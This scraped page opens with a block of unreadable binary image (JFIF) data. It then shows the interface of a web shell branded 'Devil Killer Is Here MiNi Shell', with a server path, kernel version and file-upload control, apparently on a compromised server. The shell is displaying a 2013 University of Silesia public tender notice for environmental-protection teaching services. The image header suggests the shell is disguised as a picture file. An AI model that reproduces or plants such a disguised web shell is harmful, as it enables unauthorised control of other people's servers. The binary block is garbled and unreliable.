JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130614/113019-N-2013.html

<p class="kh_header"><b>Katowice: Przeprowadzenie zajęć teoretycznych i praktycznych dla studentów kierunku Ochrona środowiska na Wydziale Biologii i Ochrony Środowiska Uniwersytetu Śląskiego</b><br>
<b>Numer ogłoszenia: 113019 - 2013; data zamieszczenia: 14.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Śląski w Katowicach Dział Zamówień Publicznych , ul. Bankowa 12, 40-007 Katowice, woj. śląskie, tel. 32 3592048, faks 32 3592048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć teoretycznych i praktycznych dla studentów kierunku Ochrona środowiska na Wydziale Biologii i Ochrony Środowiska Uniwersytetu Śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia jest realizowany w ramach projektu:

UStuŚ - Uniwersyteckie Studia Środowiskowe: Kierunek Zamawiany Ochrona Środowiska, współfinansowanego ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IV Szkolnictwo wyższe i nauka, Działanie 4.1 Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy, Poddziałanie 4.1.2 Zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy. Nr umowy POKL.04.01.02-00-073/12-00 

I.	PRZEDMIOT  ZAMÓWIENIA
1.	Przedmiotem zamówienia jest przeprowadzenie zajęć teoretycznych i praktycznych dla studentów kierunku Ochrona środowiska na Wydziale Biologii i Ochrony Środowiska Uniwersytetu Śląskiego w tematyce: Ekoinnowacje, Odnawialne źródła energii, Zarządzanie środowiskowe w przedsiębiorstwie, Technologie przyjazne dla środowiska naturalnego. 
2.	Przedmiot zamówienia obejmuje: przygotowanie materiałów dla studentów uczestniczących w zajęciach, przedstawienie teoretycznych założeń zajęć zgodnie z ich tematem, przeprowadzenie zajęć praktycznych zgodnie z ich tematem  oraz przygotowanie certyfikatów uczestnictwa dla studentów uczestniczących w zajęciach. 
3.	W ramach przedmiotu zamówienia Wykonawca zapewni salę wykładową/konferencyjną i pracownię/-e posiadające odpowiedni sprzęt i urządzenia (zgodnie z wymaganiami Zamawiającego zawartymi w załączniku nr 2 do SIWZ), umożliwiające przeprowadzenie zajęć teoretycznych i praktycznych, znajdującą się w promieniu  do 10 km  od Kampusu Uczelni (Katowice, ul. Bankowa), z możliwością dojazdu komunikacją miejską z uwagi na to, że zajęcia będące przedmiotem niniejszej umowy odbywać się będą w dni robocze na zmianę z zajęciami na studiach Zamawiającego.
4.	Zamawiający dopuszcza składanie ofert częściowych w następujących częściach:
Część A: Przeprowadzenie zajęć z przedmiotu Ekoinnowacje
Część B: Przeprowadzenie zajęć z przedmiotu Odnawialne źródła energii
Część C: Przeprowadzenie zajęć z przedmiotu  Technologie przyjazne dla środowiska naturalnego
Część D: Przeprowadzenie zajęć z przedmiotu Zarządzanie środowiskowe w przedsiębiorstwie
5.	W ramach każdej z części zamówienia:
1)  Wykonawca przeprowadzi łącznie do 66 godzin zajęć,
2)  zajęcia dla każdej grupy obejmować będą  2 godziny zajęć teoretycznych i 4 godziny zajęć praktycznych (łącznie 6 godzin zajęć dla każdej grupy) i odbywać się będą w dni robocze. Przez godzinę Zamawiający rozumie godzinę lekcyjną czyli 45 minut,
3)  zajęcia będą prowadzone dla maksymalnie 11 grup, liczących maksymalnie po 13 osób, z tym, że w przypadku uczestniczenia w zajęciach mniejszej niż zakładana przez Zamawiającego maksymalna liczba studentów, w pierwszej kolejności Zamawiający zmniejszy liczbę studentów w grupie tak by utrzymać liczbę grup na zakładanym poziomie 11, a dopiero w drugiej kolejności nastąpi zmniejszenie liczby grup, jednakże do liczby nie mniejszej niż 8 grup,
4) Zamawiający udostępni Wykonawcy, w terminie do 15 dni po rozpoczęciu każdego semestru, plan zajęć studentów, celem dokładnego ustalenia przez Wykonawcę terminu zajęć będących przedmiotem niniejszego postępowania. 

6.	Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ, stanowiący integralną część SIWZ.
7.	Wymagany termin realizacji zamówienia: 
Dla części A: do 31.10.2013r., z zastrzeżeniem, iż czas realizacji zajęć nie przekroczy 3 tygodni od daty rozpoczęcia zajęć.
Dla części B: do 30.06.2014r., z zastrzeżeniem, iż czas realizacji zajęć nie przekroczy 3 tygodni od daty rozpoczęcia zajęć.
Dla części C: do 31.12.2013r., z zastrzeżeniem, iż czas realizacji zajęć nie przekroczy 3 tygodni od daty rozpoczęcia zajęć.
Dla części D: do 31.03.2014r., z zastrzeżeniem, iż czas realizacji zajęć nie przekroczy 3 tygodni od daty rozpoczęcia zajęć.
8.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
9.	Zamawiający dopuszcza udział podwykonawców. W przypadku korzystania z podwykonawców w ofercie należy wskazać część zamówienia, której wykonanie Wykonawca powierzy podwykonawcom (załącznik nr 4 do SIWZ). 
10.	Zamawiający nie przewiduje możliwości udzielenia zamówień uzupełniających. 
11.	Zamawiający nie przewiduje aukcji elektronicznej.
12.	Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.
13.	Zamawiający nie przewiduje zawarcia umowy ramowej.
14.	Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
15.	Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla Wykonawców, u których ponad 50% zatrudnionych stanowią osoby niepełnosprawne w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnieniu osób niepełnosprawnych lub właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający oceni, czy Wykonawca spełnia powyższy warunek w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa  w rozdziale IV pkt 1 ppkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający oceni, czy Wykonawca spełnia powyższy warunek w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa  w rozdziale IV pkt 1 ppkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający oceni, czy Wykonawca spełnia powyższy warunek w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa  w rozdziale IV pkt 1 ppkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje lub będzie dysponował osobami posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia tj.:

Dla części A:<BR>
co najmniej jedną osobą, która łącznie spełnia poniższe wymagania :<BR>
a)posiada co najmniej stopień naukowy doktora nauk przyrodniczych lub doktora nauk technicznych,<BR>
b) w ciągu ostatnich pięciu lat, licząc od dnia wszczęcia (ogłoszenia) niniejszego postępowania uczestniczyła lub przeprowadziła co najmniej 2 szkolenia  lub konferencje lub inne równoznaczne formy zajęć dydaktycznych  dotyczące technik i metod analitycznych stosowanych w ochronie środowiska w zakresie: <BR>

- prowadzenie badań instalacji i urządzeń wykorzystujących odnawialne źródła energii (OZE)<BR> 
oraz<BR>
- eksploatacja budynków o bardzo niskim zużyciu energii (budynek niskoenergetyczny i/lub budynek pasywny),<BR>

Wykonawca winien wykazać obydwa ww. zakresy tematyczne.<BR>

c) w ciągu ostatnich 3 lat, licząc od dnia wszczęcia (ogłoszenia) niniejszego postępowania, wydała co najmniej 1 publikację w tematyce:<BR> 
-ekoinnowacje<BR>

Dla części B:<BR>
co najmniej jedną osobą, z która łącznie spełnia poniższe wymagania :<BR>
a) posiada co najmniej stopień naukowy doktora nauk przyrodniczych lub doktora nauk technicznych,<BR>
b) w ciągu ostatnich pięciu lat, licząc od dnia wszczęcia (ogłoszenia) niniejszego postępowania uczestniczyła lub przeprowadziła co najmniej 2 szkolenia  lub konferencje lub inne równoznaczne formy zajęć dydaktycznych  dotyczące pozyskiwania energii ze źródeł odnawialnych,<BR>
c) w ciągu ostatnich 3 lat, licząc od dnia wszczęcia (ogłoszenia) niniejszego postępowania, wydała co najmniej 1 publikację w tematyce:<BR>
-odnawialne źródła energii,<BR>

Dla części C:<BR>
co najmniej jedną osobą, z która łącznie spełnia poniższe wymagania :<BR>
a) posiada co najmniej stopień naukowy doktora nauk przyrodniczych lub doktora nauk technicznych,<BR>
b) w ciągu ostatnich pięciu lat, licząc od dnia wszczęcia (ogłoszenia) niniejszego postępowania uczestniczyła lub przeprowadziła co najmniej 2 szkolenia  lub konferencje lub inne równoznaczne formy zajęć dydaktycznych  dotyczące technologii stosowanych w ochronie środowiska,<BR>
c) w ciągu ostatnich 3 lat, licząc od dnia wszczęcia (ogłoszenia) niniejszego postępowania, wydała co najmniej 1 publikację w tematyce:<BR> 
- technologie przyjazne dla środowiska<BR>

Dla części D:<BR>
co najmniej jedną osobą, z która łącznie spełnia poniższe wymagania :<BR>
a) posiada co najmniej stopień naukowy doktora nauk przyrodniczych lub doktora nauk technicznych,<BR>
b) w ciągu ostatnich pięciu lat, licząc od dnia wszczęcia (ogłoszenia) niniejszego postępowania uczestniczyła lub przeprowadziła co najmniej 2 szkolenia  lub konferencje lub inne równoznaczne formy zajęć dydaktycznych  dotyczące zarządzania budynkami w zakresie osiągania przez nie efektywności energetycznej,<BR>
c) w ciągu ostatnich 3 lat, licząc od dnia wszczęcia (ogłoszenia) niniejszego postępowania, wydała co najmniej 1 publikację w tematyce: <BR>
- zarządzanie środowiskowe w przedsiębiorstwie<BR>

Uwaga: W przypadku gdy Wykonawca będzie składał ofertę w więcej niż jednej części postępowania, może wskazać w tych częściach jedną i tą samą osobę pod warunkiem, że łącznie będzie ona spełniała wszystkie wymagania określone dla poszczególnych części.<BR>

Ocena spełnienia warunków udziału w postępowaniu.
Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie załączonych do oferty oświadczeń oraz wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia:<BR>
1. oświadczenie o spełnieniu warunków udziału w postepowaniu,<BR> 
2. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.

- o których mowa w rozdziale IV pkt 1 ppkt 1 i 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania.  Zamawiający oceni, czy Wykonawca spełnia powyższy warunek w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa  w rozdziale IV pkt 1 ppkt 1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo - wymagane jeżeli oferta jest podpisana przez pełnomocnika (z wyłączeniem prokurenta, nawet jeżeli jest on ujawniony w dokumencie rejestrowym), a także w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (zgodnie z rozdz. II pkt 5  SIWZ). 
W razie wątpliwości co do ważności lub zakresu posiadanego pełnomocnictwa Zamawiający zastrzega sobie prawo do żądania potwierdzenia pełnomocnictwa przez Wykonawcę - oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana treści zawartej umowy może nastąpić wyłącznie w granicach unormowania art. 144 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego po podpisaniu przez obie Strony.
2. Zamawiający może wyrazić zgodę na dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, wyłącznie w sytuacji: 
1) konieczności przesunięcia terminu realizacji, jeśli konieczność ta nastąpiła  na skutek  okoliczności, których nie można było przewidzieć w chwili zawierania umowy, 
2) konieczności przesunięcia terminu realizacji zamówienia, jeśli konieczność ta nastąpiła na skutek  okoliczności leżących po stronie Zamawiającego, 
3) ewentualnej zmiany osób uczestniczących w wykonywaniu zamówienia, z zastrzeżeniem posiadania przez te osoby co najmniej takich samych właściwości (kwalifikacji) jak wymagane w dokumentacji przygotowanej dla postępowania poprzedzającego zawarcie umowy, pod rygorem niedopuszczenia tych osób do wykonywania czynności,
4)  zmiany sposobu realizacji zamówienia z samodzielnej realizacji przez Wykonawcę na realizację z udziałem podwykonawców lub zmiany zakresu czynności powierzonych podwykonawcom, z zastrzeżeniem, iż podwykonawcy będą posiadać właściwości niezbędne do realizacji zamówienia. 
5) konieczności zmiany miejsca realizacji usługi, jeśli konieczność ta nastąpiła na skutek okoliczności których nie można było przewidzieć w chwili zawierania umowy, za które Wykonawca nie ponosi odpowiedzialności, z zastrzeżeniem  posiadania przez  nie co najmniej takich samych właściwości jak wymagane w dokumentacji przygotowanej dla postępowania poprzedzającego zawarcie umowy,

6) zmiany powszechnie obowiązujących przepisów prawa lub umowy o dofinansowanie w zakresie mającym wpływ na realizację umowy,

7) ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy, Zamawiający nie dopuszcza możliwości zwiększenia  wartości umowy, o której mowa w § 6 ust. 1 umowy,

8) W sytuacji zmiany ceny w przypadku, kiedy zmiana ta będzie korzystna dla Zamawiającego tzn. na cenę niższą- na pisemny wniosek jednej ze Stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.us.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Uniwersytetu Śląskiego, tj. Katowice, ul. Bankowa 12, III p., pok. nr 69..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 09:30, miejsce: Dział Zamówień Publicznych Uniwersytetu Śląskiego, tj. Katowice, ul. Bankowa 12, III p., pok. nr 69..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest realizowany w ramach projektu:

UStuŚ - Uniwersyteckie Studia Środowiskowe: Kierunek Zamawiany Ochrona Środowiska, współfinansowanego ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IV Szkolnictwo wyższe i nauka, Działanie 4.1 Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy, Poddziałanie 4.1.2 Zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy . Nr umowy POKL.04.01.02-00-073/12-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część A: Przeprowadzenie zajęć z przedmiotu Ekoinnowacje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 1)  Wykonawca przeprowadzi łącznie do 66 godzin zajęć,
2)  zajęcia dla każdej grupy obejmować będą  2 godziny zajęć teoretycznych i 4 godziny zajęć praktycznych (łącznie 6 godzin zajęć dla każdej grupy) i odbywać się będą w dni robocze. Przez godzinę Zamawiający rozumie godzinę lekcyjną czyli 45 minut,
3)  zajęcia będą prowadzone dla maksymalnie 11 grup, liczących maksymalnie po 13 osób, z tym, że w przypadku uczestniczenia w zajęciach mniejszej niż zakładana przez Zamawiającego maksymalna liczba studentów, w pierwszej kolejności Zamawiający zmniejszy liczbę studentów w grupie tak by utrzymać liczbę grup na zakładanym poziomie 11, a dopiero w drugiej kolejności nastąpi zmniejszenie liczby grup, jednakże do liczby nie mniejszej niż 8 grup,
4) Zamawiający udostępni Wykonawcy, w terminie do 15 dni po rozpoczęciu każdego semestru, plan zajęć studentów, celem dokładnego ustalenia przez Wykonawcę terminu zajęć będących przedmiotem niniejszego postępowania. 

2. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ, stanowiący integralną część SIWZ.
3. Wymagany termin realizacji zamówienia: 
 do 31.10.2013r., z zastrzeżeniem, iż czas realizacji zajęć nie przekroczy 3 tygodni od daty rozpoczęcia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
